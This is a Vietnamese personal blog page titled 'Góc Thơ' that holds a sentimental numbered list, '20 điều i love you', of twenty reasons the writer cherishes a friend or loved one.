29
30
31


(♥ Góc Thơ ♥)

Xem theo danh mục
Xem theo danh mục:
Blog chưa có danh mục nào.

Tìm kiếm:
     


Thời tiết


20 điều i love you
01. Bạn đã chỉ cho tôi biết ý nghĩa thật sự của tình bạn .
02. Bạn luôn luôn nói những điều mà tôi muốn nghe
03. Bạn không bao giờ bỏ rơi tôi .
04. Sự chân thật tuyệt đối của bạn đã giúp cho ngọn lửa tình bạn cháy mãi .
05. Tình cảm của bạn làm tôi xúc động và cảm xúc tuyệt vời ấy sẽ có mãi .
06. Khi ở bên bạn ,tôi mới thật sự là tôi .
07. Tôi có thể nói với bạn bất cứ điều gì và bạn sẽ không chê cười .
08. Mỗi khi nghĩ đến bạn ,trong tôi lại đầy ắp những cảm xúc thật tuyệt với.
09. Bạn đã làm cho tôi cảm nhận được những điều mà tôi chưa bao giờ cảm nhận trước đó .
10. Mỗi khi tôi nhìn bạn ,tôi lại thấy mình hồi hộp lạ thường .
11. Bạn luôn là chủ đề trong những giấc mơ của tôi .
12. Bạn có khả năng hài hước tuyệt vời .
13. Bạn luôn có những ý tưởng lãng mạn thật thú vị .
14. Bạn làm những điều tốt đẹp cho tôi hơn là tôi đáng được nhận.
15. Khi bạn và tôi cùng nhau ,chúng ta có thể làm được điều kì diệu .
16. Bạn và tôi thật "hợp rơ"
17. Bạn luôn có ý nghĩa trong cuộc sống của tôi.
18. Bạn đơn giản và bình dị .
19. Bạn là người đã mở cửa trái tim tôi .
20. Và dĩ nhiên tôi mến bạn vì bạn là người hiểu biết và thông minh .







Lượt xem thứ:





Mạng xã hội của người Việt Nam.
VnVista I-Shine © 2005 - 2025   VnVista.com